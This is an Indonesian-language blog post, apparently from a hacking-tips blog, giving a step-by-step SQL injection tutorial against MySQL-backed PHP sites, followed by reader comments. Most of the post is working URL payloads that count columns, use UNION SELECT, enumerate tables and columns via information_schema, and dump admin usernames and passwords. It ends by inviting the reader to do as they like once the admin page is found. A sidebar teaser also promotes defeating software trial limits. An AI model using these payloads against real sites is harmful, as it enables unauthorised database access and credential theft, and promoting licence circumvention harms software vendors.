MOST HOT TIPS AND TRICK
- Bikin Software Trial Jadi Seumur Hidup

Ouww masa trial software sudah habis.... Pengen cari crack atau keygen nya susah juga apalagi untuk cari Serial Number nya, ehh ternyata ada juga solusi nya untuk mengatasi agar masa trial bisa jadi selamanya alias seumur hidup..
Begini cara nya... Read more >>


- Meningkatkan Kinerja Komputer

Langsung saja tidak usah kelamaan. Beberapa tips meningkatkan kinerja komputer yang mudah-mudahan berguna buat anda. Tips tersebut sebagai berikut :
Begini cara nya... Read more >>


15 Januari 2011

SQL injection Tutorial

Lama juga ga mainan blog, mungkin ini sudah usang tutorial nya bahkan untuk yang udah master bisa muntah baca ini tutorial. tapi bagaimanapun untuk yang mau belajar bisa di ikuti ini tutorial. Langsung aja ya.

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql :
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=Step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
Sehingga muncul pesan error.

==========
=Step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

check-lah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=Step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=Step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=Step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= Step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

ASCII

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=Step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= Step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Kalo sudah ketemu Halaman Admin / Cpanel nya terserah deh mau di apain..
Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

7 comments: on "SQL injection Tutorial"

A.K mengatakan...

gak jelass.....!!!

errornya apa? yg gimana??

Vellexe mengatakan...

@A K : yang dimaksud error sperti SYNTAX nya ...
sperti dibawah ini misal nya :
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/xxxxx/yyyyyyyy/simple_db.php on line 444

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/xxxxx/yyyyyyyy/simple_db.php on line 444

semoga membantu

obat hepatitis b mengatakan...

masii bingungg niii sama tutorialnya
:(

Obat Tradisional Hiv Aids mengatakan...

hmmtz langsung dicoba saja bisa gak ya???soalnya rumit banget ajarin ya!!!terimasih buat infonya...

w174rd mengatakan...

cara nge-patch-nya gimana mas??

abdu mengatakan...

mantap gan. ane langsung coba aja nie..

Posting Komentar

Info Pilihan Identitas Jika Berkomentar: Google/Blogger : Khusus yang punya Account Blogger. Wordpress : Blog degan account wordpress Name/URL : Jika tidak punya account blogger namun punya alamat Blog atau Website. Anonymous : Jika tidak ingin mempublikasikan profile anda.

Jika teman-teman menyukai artikel-nya silahkan copy paste dan tinggalkan pesan disini....